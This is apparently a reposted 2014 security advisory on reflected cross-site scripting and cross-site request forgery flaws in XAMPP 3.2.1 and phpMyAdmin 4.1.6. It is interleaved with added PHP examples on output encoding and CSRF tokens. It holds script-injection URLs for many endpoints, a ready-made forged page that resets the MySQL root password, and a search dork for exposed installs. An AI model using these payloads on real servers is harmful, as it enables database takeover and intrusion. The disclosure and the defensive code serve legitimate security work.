Mayk0

XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities

Apr 8th, 2014
Full title: XAMPP 3.2.1 & phpMyAdmin 4.1.6 - Multiple Vulnerabilities (XSS & CSRF)
Date added: 2014-04-08
Category: web applications
Platform: php
Risk: Security Risk High
Description: phpMyAdmin version 4.1.6 with XAMPP version 3.2.1 installed suffers from cross-site request forgery and cross-site scripting vulnerabilities.

=========================================================

# Title: XAMPP 3.2.1 & phpMyAdmin 4.1.6 <= multiple vulnerabilities
# Date: 6/04/2014
# Author:
# Software Link: http://www.apachefriends.org/en/xampp-windows.html
# Version: 3.2.1 & 4.1.6
# Tested on: Windows 7
# CVE : ()
[#]----------------------------------------------------------------[#]
#
# [x] XAMPP & phpMyAdmin <= 4.1.6 multiple vulnerabilities
# [x] Author : Mayank Kapoor(@wHys0SerI0s) Sujoy Chakravarti(@sujoy3188), Gurjant Singh Sadhra(@GurjantSadhra)
# [x] Contact : mayank.kapoor1708@gmail.com, gurjant31@gmail.com, sujoy3188@gmail.com
# [+] Download : http://www.apachefriends.org/en/xampp-windows.html
#
[#]----------------------------------------------------------------[#]
#
# [x] Exploit :
#
[1] phpMyAdmin is vulnerable to a cross-site scripting attack.
# The vulnerability exists within the phpMyAdmin module supplied by XAMPP.
#
# 1. Cross Site Scripting
#
# In the phpMyAdmin module of the XAMPP application the following URLs are vulnerable to cross-site scripting attacks. The "db" parameter can be passed with
# { >"'><img src="javascript:alert(311050)"> } in the URL, resulting in a reflected cross-site scripting attack. The file "c:\xampp\phpMyAdmin\libraries\db_table_exists.lib.php"
# checks only whether the "db" parameter names an existing database (lines 13-18), which does not stop the value from being reflected unencoded:
#
if (empty($is_db)) {
    if (strlen($db)) {
        // Only tests whether a database with this name can be selected;
        // the value of $db itself is left as submitted.
        $is_db = @$GLOBALS['dbi']->selectDb($db);
    } else {
        $is_db = false;
    }
}

# Vulnerable parameter: "db"
# http://[host]/phpmyadmin/chk_rel.php?db=>"'><img src="javascript:alert(311050)">&token=6026d96cfcb8993f744a00809536dc8b&goto=db_operations.php
#
# Multiple URLs affected:
http://[host]/phpmyadmin/db_printview.php
http://[host]/phpmyadmin/index.php
http://[host]/phpmyadmin/pmd_general.php
http://[host]/phpmyadmin/prefs_manage.php
http://[host]/phpmyadmin/server_collations.php
http://[host]/phpmyadmin/server_databases.php
http://[host]/phpmyadmin/server_engines.php
http://[host]/phpmyadmin/server_export.php
http://[host]/phpmyadmin/server_import.php
http://[host]/phpmyadmin/server_privileges.php
http://[host]/phpmyadmin/server_replication.php
http://[host]/phpmyadmin/server_sql.php
http://[host]/phpmyadmin/server_status.php
http://[host]/phpmyadmin/server_variables.php
http://[host]/phpmyadmin/sql.php
http://[host]/phpmyadmin/tbl_create.php

# Vulnerable parameter: "table"
#
# Similarly, the "table" parameter can also be submitted with { >"'><img src="javascript:alert(311050)"> } in the URL, resulting in a reflected cross-site scripting attack.
#
# Multiple URLs affected:

http://[host]/phpmyadmin/tbl_select.php?db=information_schema&token=6026d96cfcb8993f744a00809536dc8b&goto=db_structure.php&table=>"'><img src="javascript:alert(347790)">#PMAURL-0:tbl_select.php?db=information_schema&table=>"'><img+src="javascript:alert(347790)">&server=1&target=&lang=en&collation_connection=utf8mb4_general_ci&token=529d5dba2f3dd12daf48aa38596e1708

http://[host]/phpmyadmin/tbl_structure.php
#
#
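The check quoted above validates only that "db" names a database that can be selected; the reflected value still has to be HTML-encoded where it is written into the page. The PHP below is an added example, not phpMyAdmin or XAMPP code: db_exists(), render_heading_unsafe(), html_encode() and render_heading_safe() are hypothetical names standing in for the existence check and for the two output patterns, and the input is the payload quoted in this advisory.

```php
<?php
// Added example (not phpMyAdmin or XAMPP code). Shows why the existence check
// quoted from db_table_exists.lib.php is not output encoding: a value can fail
// the check and still be written into the page as live markup.
declare(strict_types=1);

// Stand-in for the selectDb() existence check: true only when $db is one of
// the names in this constructed list.
function db_exists(string $db): bool
{
    $known = ['information_schema', 'mysql', 'test'];
    return in_array($db, $known, true);
}

// Vulnerable pattern: the request value is concatenated into HTML unchanged.
function render_heading_unsafe(string $db): string
{
    return '<h2>Database: ' . $db . '</h2>';
}

// Hardened pattern: encode at the point of output, whatever validation ran
// earlier. ENT_QUOTES encodes both quote characters, so the value is also inert
// inside an attribute; ENT_SUBSTITUTE replaces invalid UTF-8 instead of
// returning an empty string.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_heading_safe(string $db): string
{
    return '<h2>Database: ' . html_encode($db) . '</h2>';
}

// Input for the walk-through: the payload quoted in this advisory.
$payload = '>"\'><img src="javascript:alert(311050)">';

var_dump(db_exists($payload));                  // the existence check fails...
echo render_heading_unsafe($payload), PHP_EOL;  // ...but the <img> tag survives
echo render_heading_safe($payload), PHP_EOL;    // angle brackets and quotes encoded
```

Run it with the php command-line binary. In the safe rendering every <, >, " and ' has become an entity, so the browser displays the payload as text instead of creating an element. The encoding has to happen at output: the "db" value is a legitimate argument to selectDb() whatever characters it contains, so no input check on it can substitute for encoding the reflected copy.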
# 2. Cross Site Request Forgery
# After installing XAMPP the default MySQL password is blank and the default user is "root". The page "http://localhost/security/xamppsecurity.php" offers an option to change
# the MySQL password for the user "root". The form that submits the new password carries no token or any other CSRF protection. The HTML page below can be sent to the victim,

<html>
<script>
document.getElementById("xampp").submit();
</script>
<body onload="run_once()">
<form id="xampp" action="http://localhost/security/xamppsecurity.php" method="POST">
<input type="hidden" name="mypasswd" value="test@123" />
<input type="hidden" name="mypasswdrepeat" value="test@123" />
<input type="hidden" name="authphpmyadmin" value="cookie" />
<input type="hidden" name="changing" value="Password changing" />
<input type="hidden" name="xamppuser" value="" />
<input type="hidden" name="xampppasswd" value="" />
<input type="submit" value="Click here" />
</form>
</body>
</html>

# thus successfully changing the password to "test@123". This only works if the password has never been changed since installation.
#
#
# Another location in the XAMPP application vulnerable to cross-site request forgery is the guestbook section http://localhost/xampp/guestbook-en.pl .

http://localhost/xampp/guestbook-en.pl?f_name=spam&f_email=spam&f_text=spam

dork: "inurl:xampp/guestbook-en.pl"

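Both the password form and the guestbook accept a state-changing request with nothing in it that proves the request came from the application's own page. The PHP below is an added example, not XAMPP's xamppsecurity.php or guestbook code: it shows the synchronizer-token pattern that closes the gap. The functions csrf_token(), render_password_form(), csrf_valid() and handle_password_change(), the session key 'csrf_token' and the field names other than those in the advisory's form are hypothetical, and the session is modelled as a plain array so the walk-through runs from the command line (in a real handler it would be $_SESSION).

```php
<?php
// Added example (not XAMPP's xamppsecurity.php): synchronizer-token protection
// for a state-changing form such as the MySQL password change described above.
// The session is a plain array here so the functions run without a web server.
declare(strict_types=1);

const CSRF_KEY = 'csrf_token';   // hypothetical session key name

// Issue (or reuse) a per-session token: 32 random bytes, hex-encoded.
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_KEY])) {
        $session[CSRF_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_KEY];
}

// Render the form with the token as a hidden field. A page on another origin
// cannot read this value, so it cannot assemble a submission that passes.
function render_password_form(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<form method="POST" action="/security/xamppsecurity.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input type="password" name="mypasswd">'
         . '<input type="password" name="mypasswdrepeat">'
         . '<input type="submit" name="changing" value="Password changing">'
         . '</form>';
}

// Validate a submission. hash_equals() compares in constant time, so the check
// does not leak the token byte by byte through response timing.
function csrf_valid(array $session, array $post): bool
{
    $expected = $session[CSRF_KEY] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== ''
        && is_string($given)
        && hash_equals($expected, $given);
}

// Handler: reject before touching any state; $changePassword stands in for the
// code that actually sets the MySQL password.
function handle_password_change(array &$session, array $post, callable $changePassword): string
{
    if (!csrf_valid($session, $post)) {
        return 'rejected: missing or invalid CSRF token';
    }
    if (($post['mypasswd'] ?? '') === '' || $post['mypasswd'] !== ($post['mypasswdrepeat'] ?? null)) {
        return 'rejected: passwords empty or do not match';
    }
    $changePassword($post['mypasswd']);
    unset($session[CSRF_KEY]);   // rotate the token after a successful change
    return 'ok: password changed';
}

// Constructed walk-through. A forged POST carrying only the advisory's fields
// has no token and is refused; a genuine one embeds the token from the form.
$session = [];
render_password_form($session);   // victim loads the real form; token issued
$forged = ['mypasswd' => 'test@123', 'mypasswdrepeat' => 'test@123', 'changing' => 'Password changing'];
echo handle_password_change($session, $forged, fn(string $p) => null), PHP_EOL;

$genuine = $forged + ['csrf_token' => $session[CSRF_KEY]];
echo handle_password_change($session, $genuine, fn(string $p) => null), PHP_EOL;
```

Run it with the php command-line binary: the forged submission is rejected and the genuine one accepted. The guestbook handler needs the same check on its POST. As defence in depth, marking the session cookie SameSite=Lax and verifying the Origin header on state-changing requests limit cross-site submissions even for a form the token check missed.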
[#]----------------------------------------------------------------[#]

#EOF